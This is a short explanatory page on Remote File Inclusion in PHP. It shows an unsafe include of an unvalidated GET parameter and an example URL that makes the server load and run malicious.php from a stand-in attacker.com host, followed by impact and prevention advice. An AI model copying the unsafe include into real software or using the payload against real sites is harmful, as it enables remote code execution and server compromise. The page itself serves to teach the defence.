Remote File Inclusion (RFI)
Description
We have seen LFI(Local File Inclusion) and RFI (Remote File Inclusion) very similar; the only difference is that RFI allows the execution of files from a remote server.
RFI is more critical than LFI, as the attacker can execute code from attacker's server.
for eg., http://site.com/?file=news.php
This is implemented in php at server as,
$file = $_GET['file'];
include($file);
This is Unsafe way of implementation as it is not validating user's input.
Then, the attacker may supply any other local file, which gets executed by the server.
http://site.com/?file=http://attacker.com/malicious.php
Impact
- If the web-server user is privileged, then the full server gets compromised.
- Remote code execution (RCE) is possible.
Prevention
- If you do not need to include any executable file from a remote server, Disable remote inclusion feature in the server configuration.
- By default, It is disabled in the PHP configuration file (php.ini).
- Never trust the user, always filter user input and then give it to further function.
- Instead of using file path in URL, Store it in some database and assigned numeric id to it, and use the ID in URL.
- Prefer whitelisting files that you want.